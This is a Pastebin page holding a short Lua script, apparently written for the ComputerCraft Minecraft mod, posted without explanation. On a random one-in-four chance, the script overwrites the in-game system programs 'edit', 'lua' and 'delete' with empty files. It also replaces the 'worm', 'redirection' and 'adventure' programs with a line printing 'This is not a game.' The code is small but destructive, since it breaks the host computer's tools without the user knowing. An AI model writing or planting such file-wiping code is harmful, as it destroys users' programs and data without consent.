Advertisement
Parlocameon

StealthX

Dec 5th, 2016
341
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.53 KB | None | 0 0
  1. rPs1 = math.random(1,4)
  2. if rPs1 == 2 then
  3.     local p1 = fs.open("edit","w")
  4.     p1.writeLine("")
  5.     p1.close()
  6.     local p2 = fs.open("lua", "w")
  7.     p2.writeLine("")
  8.     p2.close()
  9.     local p3 = fs.open("delete", "w")
  10.     p3.writeLine("")
  11.     p3.close()
  12.     local p4 = fs.open("worm", "w")
  13.     p4.writeLine('print("This is not a game.")')
  14.     p4.close()
  15.     local p5 = fs.open("redirection", "w")
  16.     p5.writeLine('print("This is not a game.")')
  17.     p5.close()
  18.     local p6 = fs.open("adventure", "w")
  19.     p6.writeLine('print("This is not a game.")')
  20.     p6.close()
  21. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement